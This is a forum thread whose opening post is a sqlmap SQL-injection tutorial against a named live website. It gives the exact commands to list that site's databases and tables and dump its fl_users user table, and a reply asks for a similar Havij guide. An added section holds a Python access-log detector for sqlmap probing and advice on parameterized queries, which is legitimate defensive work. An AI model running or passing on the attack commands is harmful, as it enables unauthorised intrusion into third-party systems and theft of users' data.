.Slacker Posted August 30, 2012

The vulnerable link I'm going to use is (more vulnerable links at the end) "http://www.waterufo.net/item.php?id=200"

1. Open BackTrack5 and open a new Konsole.

Type the file path of sqlmap:

cd /pentest/web/scanners/sqlmap

Next step is:

./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --level 5 --risk 3 --dbs

(If we want to scan the full website, the syntax will be ./sqlmap.py -u Welcome to Water UFO Research Site --level 5 --risk 3 --dbs)

We got information that the parameter is injectable.

Type 'N' (I'm stopping the scan because I got one injectable parameter; if you want you can continue the scan).

We got the database names.

The next step is to find the tables and columns on the database. I'm taking the database "waterufo_net":

./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_net

We got all the tables in the database.

Next we have to find the columns in the table fl_users:

./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net

It will display the columns on the database.

To retrieve the column values, type --dump at the end of the previous query:

./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net --dump

Source: hakforums.net
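From the defender's side, a scan like the one in the post above leaves a recognisable trail in the web server's access log. The following is an added example, not part of the original post: it flags clients that send non-numeric values for a numeric `id` parameter or present a `sqlmap/` user-agent. The log lines, IP addresses, threshold and the function name `flag_clients` are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (combined format); IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [30/Aug/2012:10:00:01 +0000] "GET /item.php?id=200 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [30/Aug/2012:10:00:02 +0000] "GET /item.php?id=200 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [30/Aug/2012:10:00:03 +0000] "GET /item.php?id=200%27 HTTP/1.1" 500 310 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.0.2.44 - - [30/Aug/2012:10:00:04 +0000] "GET /item.php?id=200%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [30/Aug/2012:10:00:05 +0000] "GET /item.php?id=200%20AND%201%3D2 HTTP/1.1" 200 420 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Aug/2012:10:00:06 +0000] "GET /item.php?id=201 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def flag_clients(log_text, param="id", threshold=2):
    """Return {ip: sorted reasons} for clients probing a numeric parameter."""
    bad_values = defaultdict(int)
    reasons = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # The user-agent is client-controlled, so treat it as a weak signal only.
        if m["ua"].lower().startswith("sqlmap/"):
            reasons[m["ip"]].add("sqlmap user-agent")
        # parse_qs percent-decodes values; keep blanks so "id=" is counted too.
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for value in query.get(param, []):
            # A legitimate item id is a short run of digits and nothing else.
            if not re.fullmatch(r"\d{1,10}", value):
                bad_values[m["ip"]] += 1
    for ip, count in bad_values.items():
        if count >= threshold:
            reasons[ip].add(f"{count} non-numeric {param} values")
    return {ip: sorted(r) for ip, r in reasons.items()}

if __name__ == "__main__":
    for ip, why in flag_clients(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(why))
```

The same strict-digits check belongs in the application itself, ahead of a parameterized query, so that such values never reach the database.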
hades Posted August 30, 2012

WOW!!! We're waiting for one about Havij too. Keep up the good work!